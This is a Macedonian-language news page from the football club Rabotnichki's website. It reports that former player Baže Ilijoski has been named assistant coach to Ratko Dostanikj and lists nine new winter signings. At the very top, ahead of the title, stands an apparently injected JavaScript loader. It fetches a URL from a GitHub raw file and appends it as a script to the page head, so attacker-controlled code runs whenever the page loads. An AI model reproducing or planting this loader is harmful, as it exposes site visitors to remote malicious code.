;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Баже Илијоски асистент на Ратко Достаниќ, девет нови имиња во Работнички
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Баже Илијоски асистент на Ратко Достаниќ, девет нови имиња во Работнички

Работнички направи голема реконструкција во составот во зимскиот преоден рок. Промени има и во стручниот штаб откако за асистент на шефот Ратко Достаниќ е именуван Баже Илијоски, поранешниот истакнат фудбалер на нашиот клуб. Тој почнува нова кариера и ќе го учи тренерскиот занает, а неговото искуство секако ќе биде драгоцено за актуелниот играчки кадар.

„Верувам дека со напорна работа Работнички ќе се врати на старите победнички патеки, а јас отворам еден нов сегмент во животот, во клубот кој дадов најмногу и како фудбалер. Не се сомневам дека ќе научам од Ратко Достаниќ и се надевам дека ќе можам да помогнам со моето досегашно искуство“, вели Баже Илијоски.

Работнички во зимската пауза доведе девет нови имиња. Јаник Дао (Австралија), Бранислав Трајковиќ (Србија), Драшко Ѓорѓевиќ (Србија), Христијан Пецов и Дин Аломеровиќ се засилувања за одбраната, Милош Тошевски, Јордан Ломба (Белгија) и Христијан Вецевски треба да ја засилат конкуренцијата во средниот ред, а Марио Крстовски кој дојде на позајмица од Академија Пандев е ново име во нападот на Работнички.